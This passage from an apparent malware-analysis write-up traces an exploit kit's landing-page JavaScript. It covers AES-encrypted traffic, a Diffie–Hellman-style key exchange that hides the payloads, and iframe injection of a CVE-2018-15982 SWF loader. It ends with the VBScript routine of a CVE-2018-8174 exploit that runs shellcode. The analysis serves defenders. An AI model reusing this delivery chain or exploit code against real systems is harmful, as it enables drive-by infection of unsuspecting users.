)['lIlIlll11l'](window['Il1IIllIlI1I']['IIIlI']['Il11I1II']);
// parse the decrypted text as JSON
var l1I1l1 = window['lIl11'](lIlIl1IIl11);
</code></pre></div></div> <p>The POST response is encrypted with AES. The key and IV are the same as before, namely the values hard-coded in the JavaScript (<code class="language-plaintext highlighter-rouge">8b69cbdfc5fe43e69b7920c8ee721fc9</code> and <code class="language-plaintext highlighter-rouge">301ae8205ddcd5897df69e3b0c056c34</code>). Decryption yields JSON, which is then parsed. The decrypted JSON looks like this.</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
    "IlI1l": "9b412e5c651d73fd1e271dd63f6901a0",
    "I1111": "r+sZGwxURs48PDt8pilYLNYjKbVrMHSmlgv0jeEE7qd8KN+KbbqRpYBUUrEFfM5VSLfRPthHQmyzFoY7fuCtOQQ9vUiMBC+3\/pL…"
}
</code></pre></div></div> <p>The second value is decrypted using the first one (a 32-character hexadecimal string). We call the first value str_F. 
This decryption also uses AES, but the key and IV differ from before.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var lIlll1IIlI = window['l1l1IIlIlI'](l1I1l1['lIlll1IIlI'], 16);   // str_F as a BigInteger
// key (str_G) =&gt; str_F.modPow(str_C, str_D)
var llIIlI = lIlll1IIlI['ll11IIl'](ll1l1IlIIIll, lll1II);
var I1Il1I1 = llIIlI['lIlIlll11l'](16);
// BigInteger.toString(16) drops leading zeros, so left-pad back to 32 hex characters (16 bytes)
var IIIIlI1IllII = 32 - I1Il1I1.length;
while (IIIIlI1IllII &gt; 0) {
    I1Il1I1 = '0' + I1Il1I1;
    IIIIlI1IllII--;
}
var II1ll = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](I1Il1I1);        // key: str_G
var lI1lIl1Ill = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](l1ll1);     // iv: str_A
// aes_decrypt(enc_data, key, iv)
var Il11lII1 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l'](
    l1I1l1['lIlIl1IIl11'],         // enc_data
    II1ll,                         // str_G
    { lI1lIl1Ill: lI1lIl1Ill }     // iv =&gt; str_A
);
</code></pre></div></div> <p>The value generated from str_F, str_C and str_D is called str_G. So str_C is required to decrypt the data, but str_C has never been sent to the server. From the traffic data you can observe str_E and the inputs to str_G, both derived from str_C, but str_C itself cannot be recovered from them. Please see Wikipedia for details.</p> <ul> <li><a href="https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange">Diffie–Hellman key exchange - Wikipedia</a></li> </ul> <p>The data thus decrypted is executed as JavaScript.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// eval
II1Il['ll1I1']();
</code></pre></div></div> <p>Let’s look at the executed code. First, the URL used next is decrypted. 
The key and IV used at this time are hard-coded initial values.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// aes_decrypt(enc_url, key, iv)</span> <span class="kd">var</span> <span class="nx">l11l1I1</span> <span class="o">=</span><span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">Il1IIllIlI1I</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">lI11lIl</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">l11II11l</span><span class="dl">"</span><span class="p">](</span> <span class="dl">"</span><span class="s2">l9kie2x7t4Iq4hRNA3G3Juz+buSrv9OSyATsAvZRjsoWkjatAa3Am6oRnar5jjv2N8XFpvDYQbKswFbyKiGPXM/eRwj5+hz4hg+dTKr5BLk=</span><span class="dl">"</span><span class="p">,</span> <span class="nx">III1l1</span><span class="p">,</span> <span class="p">{</span> <span class="na">lI1lIl1Ill</span><span class="p">:</span><span class="nx">II1ll11I</span> <span class="p">}</span> <span class="p">)[</span><span class="dl">"</span><span class="s2">lIlIlll11l</span><span class="dl">"</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">"</span><span class="s2">Il1IIllIlI1I</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">IIIlI</span><span class="dl">"</span><span class="p">][</span><span class="dl">"</span><span class="s2">Il11I1II</span><span class="dl">"</span><span class="p">]);</span> </code></pre></div></div> <p>Then, as before, the function is called. Let’s look at the function. First, define the necessary data for encryption/decryption as before. 
Give each one a name as before.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// str_A2</span> <span class="kd">var</span> <span class="nx">l1ll1</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lIIIlI1IlII</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">I111l11l</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1I</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">]();</span> <span class="c1">// str_B2</span> <span class="kd">var</span> <span class="nx">lIlII11</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l1IIlIlI</span><span class="dl">'</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lIIIlI1IlII</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">I111l11l</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1I</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](),</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_C2</span> <span class="kd">var</span> <span class="nx">ll1l1IlIIIll</span> <span 
class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l1IIlIlI</span><span class="dl">'</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lIIIlI1IlII</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">I111l11l</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1I</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](),</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_D2</span> <span class="kd">var</span> <span class="nx">lll1II</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l1IIlIlI</span><span class="dl">'</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lIIIlI1IlII</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">I111l11l</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1I</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](),</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_E2 =&gt; str_B2.powMod(str_C2, str_D2)</span> <span class="kd">var</span> <span class="nx">l11IlIl</span> 
<span class="o">=</span> <span class="nx">lIlII11</span><span class="p">[</span><span class="dl">'</span><span class="s1">ll11IIl</span><span class="dl">'</span><span class="p">](</span><span class="nx">ll1l1IlIIIll</span><span class="p">,</span><span class="nx">lll1II</span><span class="p">);</span> </code></pre></div></div> <p>Next, prepare the data to send as a POST request. Unlike before, Adobe Flash Player version information is also sent.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">l11IlIIlllll</span> <span class="o">=</span> <span class="p">{};</span> <span class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlII11</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">lIlII11</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_B2</span> <span class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">lll1II</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">lll1II</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_D2</span> <span class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">l11IlIl</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">l11IlIl</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_E2</span> <span 
class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">lI1lIl1Ill</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">l1ll1</span><span class="p">;</span> <span class="c1">// str_A2</span> <span class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">II1l1IlI</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">@@</span><span class="dl">'</span><span class="p">[</span><span class="dl">'</span><span class="s1">II1l1IlI</span><span class="dl">'</span><span class="p">]();</span> <span class="c1">// browser check data</span> <span class="nx">l11IlIIlllll</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l111I</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l111I</span><span class="dl">'</span><span class="p">];</span> <span class="c1">// Adobe Flash Player version check data</span> </code></pre></div></div> <p>The sending process is the same as the previous one. 
The key and IV used in this case are also initial values.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">I1l1I1</span><span class="dl">'</span><span class="p">](</span><span class="nx">Il1I11l</span><span class="p">,</span><span class="dl">"</span><span class="s2">post</span><span class="dl">"</span><span class="p">,</span><span class="nx">l11l1I1</span><span class="p">,</span><span class="kc">true</span><span class="p">);</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1lllIIlI</span><span class="dl">'</span><span class="p">](</span> <span class="nx">Il1I11l</span><span class="p">,</span> <span class="c1">// aes_encrypt</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lI11lIl</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">Ill1lI1Ill</span><span class="dl">'</span><span class="p">](</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">IIII1Il</span><span class="dl">'</span><span class="p">](</span><span class="nx">l11IlIIlllll</span><span class="p">),</span> <span class="c1">// POST Data</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">III1l1</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// key</span> <span class="p">{</span><span class="na">lI1lIl1Ill</span><span class="p">:</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">II1ll11I</span><span class="dl">'</span><span class="p">]}</span> <span class="c1">// iv</span> <span class="p">)[</span><span 
class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">]()</span> <span class="p">);</span> </code></pre></div></div> <p>Thus, <code class="language-plaintext highlighter-rouge">onreadystatechange</code> is called as well. Here too, the decoding process is performed as before. First, decode POST response data with the same key and IV as before.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// aes_decrypt(enc_data, key, iv)</span> <span class="kd">var</span> <span class="nx">lIlIl1IIl11</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lI11lIl</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">l11II11l</span><span class="dl">'</span><span class="p">](</span> <span class="nx">Il1I11l</span><span class="p">[</span><span class="dl">'</span><span class="s1">responseText</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// enc_data</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">III1l1</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// key</span> <span class="p">{</span><span class="na">lI1lIl1Ill</span><span class="p">:</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">II1ll11I</span><span class="dl">'</span><span class="p">]}</span> <span class="c1">// iv</span> <span class="p">)[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span 
class="dl">'</span><span class="s1">IIIlI</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">Il11I1II</span><span class="dl">'</span><span class="p">]);</span> </code></pre></div></div> <p>Parsing the decoded result as JSON gives three fields, shown below. The first, a 32-character hexadecimal string, is str_F2.</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w"> </span><span class="nl">"lIlll1IIlI"</span><span class="p">:</span><span class="w"> </span><span class="s2">"87e087b48d4b06215f486021f23f5470"</span><span class="p">,</span><span class="w"> </span><span class="nl">"lIIIIllIl1"</span><span class="p">:</span><span class="w"> </span><span class="s2">"oUeRtTwLk9lLYqMwZC3AM49H8HDw15IqymZ0W</span><span class="se">\/</span><span class="s2">vw87Vd9RtdXhps9ZppZc</span><span class="se">\/</span><span class="s2">INO01Bqk79BOMS9ykHCDPE</span><span class="se">\/\/</span><span class="s2">kWCHQuuh0</span><span class="se">\/</span><span class="s2">rr…"</span><span class="p">,</span><span class="w"> </span><span class="nl">"II11lIl11"</span><span class="p">:</span><span class="w"> </span><span class="s2">"88HY4nkc9TWmnRPi</span><span class="se">\/</span><span class="s2">hEPmk8ZCTJ5tIwItosOTmqFjUBFxCXfoXdMKas+TeKLUbdwsXAhvGa35wNmMnajdPzt1huWerzwnhoGcFP…"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <p>Next, the other two fields are decrypted. str_G2 is derived from str_F2 by the same modular exponentiation (str_F2 raised to str_C2 modulo str_D2), zero-padded to 32 hexadecimal characters and used as the AES key, with str_A2 as the IV. Both payloads are decrypted this way.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">lIlll1IIlI</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">l1l1IIlIlI</span><span class="dl">'</span><span class="p">](</span><span class="nx">l1I1l1</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlll1IIlI</span><span class="dl">'</span><span class="p">],</span><span class="mi">16</span><span class="p">);</span> <span class="c1">// str_G2 =&gt; str_F2.modPow(str_C2, str_D2)</span> <span class="kd">var</span> <span class="nx">llIIlI</span> <span class="o">=</span> <span class="nx">lIlll1IIlI</span><span class="p">[</span><span class="dl">'</span><span class="s1">ll11IIl</span><span class="dl">'</span><span class="p">](</span><span class="nx">ll1l1IlIIIll</span><span class="p">,</span><span class="nx">lll1II</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">I1Il1I1</span> <span class="o">=</span> <span class="nx">llIIlI</span><span class="p">[</span><span class="dl">'</span><span class="s1">lIlIlll11l</span><span class="dl">'</span><span class="p">](</span><span class="mi">16</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">IIIIlI1IllII</span> <span class="o">=</span> <span class="mi">32</span> <span class="o">-</span> <span class="nx">I1Il1I1</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="k">while</span><span class="p">(</span><span class="nx">IIIIlI1IllII</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="nx">I1Il1I1</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">0</span><span class="dl">'</span><span class="o">+</span><span class="nx">I1Il1I1</span><span class="p">;</span> <span 
class="nx">IIIIlI1IllII</span><span class="o">--</span><span class="p">;</span> <span class="p">}</span> <span class="kd">var</span> <span class="nx">II1ll</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">IIIlI</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1lI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">ll1llI1</span><span class="dl">'</span><span class="p">](</span><span class="nx">I1Il1I1</span><span class="p">);</span> <span class="c1">// str_G2</span> <span class="kd">var</span> <span class="nx">lI1lIl1Ill</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">IIIlI</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">II1I1lI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">ll1llI1</span><span class="dl">'</span><span class="p">](</span><span class="nx">l1ll1</span><span class="p">);</span> <span class="c1">// str_A2</span> <span class="c1">// aes_decrypt()</span> <span class="kd">var</span> <span class="nx">I1II111I1</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lI11lIl</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">l11II11l</span><span class="dl">'</span><span class="p">](</span> <span class="nx">l1I1l1</span><span class="p">[</span><span 
class="dl">'</span><span class="s1">lIIIIllIl1</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// enc_data_1</span> <span class="nx">II1ll</span><span class="p">,</span> <span class="c1">// str_G2</span> <span class="p">{</span><span class="na">lI1lIl1Ill</span><span class="p">:</span> <span class="nx">lI1lIl1Ill</span><span class="p">}</span> <span class="c1">// str_A2</span> <span class="p">);</span> <span class="kd">var</span> <span class="nx">IIIIl</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">Il1IIllIlI1I</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">lI11lIl</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">l11II11l</span><span class="dl">'</span><span class="p">](</span> <span class="nx">l1I1l1</span><span class="p">[</span><span class="dl">'</span><span class="s1">II11lIl11</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// enc_data_2</span> <span class="nx">II1ll</span><span class="p">,</span> <span class="c1">// str_G2</span> <span class="p">{</span><span class="na">lI1lIl1Ill</span><span class="p">:</span> <span class="nx">lI1lIl1Ill</span><span class="p">}</span> <span class="c1">// str_A2</span> <span class="p">);</span> </code></pre></div></div> <p>The data thus decoded is written to Body and executed. 
Each payload is written into its own iframe appended to the document body: one is the CVE-2018-8174 exploit code, the other an SWF loader page that fetches the CVE-2018-15982 exploit.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span><span class="p">(</span><span class="nx">IlIII1lll</span><span class="p">[</span><span class="dl">'</span><span class="s1">length</span><span class="dl">'</span><span class="p">]</span> <span class="o">!==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">IIlIl</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">createElement</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">iframe</span><span class="dl">"</span><span class="p">);</span> <span class="nx">IIlIl</span><span class="p">[</span><span class="dl">'</span><span class="s1">setAttribute</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">id</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">IlIlll1I1</span><span class="dl">"</span><span class="p">);</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">getElementsByTagName</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">BODY</span><span class="dl">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">IIlIl</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">I11I11IIlIII</span> <span 
class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">getElementById</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">IlIlll1I1</span><span class="dl">"</span><span class="p">)[</span><span class="dl">'</span><span class="s1">contentWindow</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">];</span> <span class="nx">I11I11IIlIII</span><span class="p">[</span><span class="dl">'</span><span class="s1">open</span><span class="dl">'</span><span class="p">]();</span> <span class="nx">I11I11IIlIII</span><span class="p">[</span><span class="dl">'</span><span class="s1">write</span><span class="dl">'</span><span class="p">](</span><span class="nx">IlIII1lll</span><span class="p">);</span> <span class="nx">I11I11IIlIII</span><span class="p">[</span><span class="dl">'</span><span class="s1">close</span><span class="dl">'</span><span class="p">]();</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="nx">lIl1l1I</span><span class="p">[</span><span class="dl">'</span><span class="s1">length</span><span class="dl">'</span><span class="p">]</span> <span class="o">!==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">l1III11</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">createElement</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">iframe</span><span class="dl">"</span><span class="p">);</span> <span 
class="nx">l1III11</span><span class="p">[</span><span class="dl">'</span><span class="s1">setAttribute</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">id</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">lII1I1IlI1I</span><span class="dl">"</span><span class="p">);</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">getElementsByTagName</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">BODY</span><span class="dl">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">l1III11</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">llIll1lI</span> <span class="o">=</span> <span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">getElementById</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="s2">lII1I1IlI1I</span><span class="dl">"</span><span class="p">)[</span><span class="dl">'</span><span class="s1">contentWindow</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">document</span><span class="dl">'</span><span class="p">];</span> <span class="nx">llIll1lI</span><span class="p">[</span><span class="dl">'</span><span class="s1">open</span><span class="dl">'</span><span class="p">]();</span> <span class="nx">llIll1lI</span><span class="p">[</span><span class="dl">'</span><span class="s1">write</span><span class="dl">'</span><span class="p">](</span><span class="nx">lIl1l1I</span><span class="p">);</span> <span 
class="nx">llIll1lI</span><span class="p">[</span><span class="dl">'</span><span class="s1">close</span><span class="dl">'</span><span class="p">]();</span> <span class="p">}</span> </code></pre></div></div> <p>For the SWF loader, the following HTML is written into the iframe.</p> <div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;meta</span> <span class="na">http-equiv=</span><span class="s">"x-ua-compatible"</span> <span class="na">content=</span><span class="s">"IE=10"</span><span class="nt">&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"BnjJbx"</span><span class="nt">&gt;&lt;object</span> <span class="na">classid=</span><span class="s">"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"</span> <span class="na">width=</span><span class="s">"205"</span> <span class="na">height=</span><span class="s">"528"</span> <span class="na">id=</span><span class="s">"BnjJbx"</span> <span class="na">align=</span><span class="s">"middle"</span><span class="nt">&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"movie"</span> <span class="na">value=</span><span class="s">"/24_02_1964/05_04_1933/3410-Skegger-12666"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"quality"</span> <span class="na">value=</span><span class="s">"high"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"bgcolor"</span> <span class="na">value=</span><span class="s">"#ffffff"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"play"</span> <span class="na">value=</span><span class="s">"true"</span> <span class="nt">/&gt;</span> <span 
class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"loop"</span> <span class="na">value=</span><span class="s">"true"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"wmode"</span> <span class="na">value=</span><span class="s">"window"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"scale"</span> <span class="na">value=</span><span class="s">"showall"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"menu"</span> <span class="na">value=</span><span class="s">"false"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"devicefont"</span> <span class="na">value=</span><span class="s">"false"</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"salign"</span> <span class="na">value=</span><span class="s">""</span> <span class="nt">/&gt;</span> <span class="nt">&lt;param</span> <span class="na">name=</span><span class="s">"allowScriptAccess"</span> <span class="na">value=</span><span class="s">"sameDomain"</span> <span class="nt">/&gt;&lt;/object&gt;&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre></div></div> <p>The object tag thus loads and executes the SWF file that exploits CVE-2018-15982.</p> <h2 id="cve-2018-8174">CVE-2018-8174</h2> <p>The exploit code used is very similar to the public PoC.</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">Sub</span> <span class="nf">StartExploit</span> <span class="n">UAF</span> <span class="n">InitObjects</span> <span class="n">vb_adrr</span><span class="o">=</span><span class="n">LeakVBAddr</span><span class="p">()</span> <span class="n">vbs_base</span><span 
class="o">=</span><span class="n">GetBaseByDOSmodeSearch</span><span class="p">(</span><span class="n">GetUint32</span><span class="p">(</span><span class="n">vb_adrr</span><span class="p">))</span> <span class="n">msv_base</span><span class="o">=</span><span class="n">GetBaseFromImport</span><span class="p">(</span><span class="n">vbs_base</span><span class="p">,</span><span class="s">"msvcrt.dll"</span><span class="p">)</span> <span class="n">krb_base</span><span class="o">=</span><span class="n">GetBaseFromImport</span><span class="p">(</span><span class="n">msv_base</span><span class="p">,</span><span class="s">"kernelbase.dll"</span><span class="p">)</span> <span class="n">ntd_base</span><span class="o">=</span><span class="n">GetBaseFromImport</span><span class="p">(</span><span class="n">msv_base</span><span class="p">,</span><span class="s">"ntdll.dll"</span><span class="p">)</span> <span class="n">VirtualProtectAddr</span><span class="o">=</span><span class="n">GetProcAddr</span><span class="p">(</span><span class="n">krb_base</span><span class="p">,</span><span class="s">"VirtualProtect"</span><span class="p">)</span> <span class="n">NtContinueAddr</span><span class="o">=</span><span class="n">GetProcAddr</span><span class="p">(</span><span class="n">ntd_base</span><span class="p">,</span><span class="s">"NtContinue"</span><span class="p">)</span> <span class="n">SetMemValue</span> <span class="n">GetShellcode</span><span class="p">()</span> <span class="n">ShellcodeAddr</span><span class="o">=</span><span class="n">GetMemValue</span><span class="p">()</span><span class="o">+</span><span class="mi">8</span> <span class="n">SetMemValue</span> <span class="n">WrapShellcodeWithNtContinueContext</span><span class="p">(</span><span class="n">ShellcodeAddr</span><span class="p">)</span> <span class="n">lIlll</span><span class="o">=</span><span class="n">GetMemValue</span><span class="p">()</span><span class="o">+</span><span class="mi">69596</span> <span 
class="n">SetMemValue</span>
ExpandWithVirtualProtect(lIlll)
llIIll=GetMemValue()
ExecuteShellcode
End Sub
StartExploit
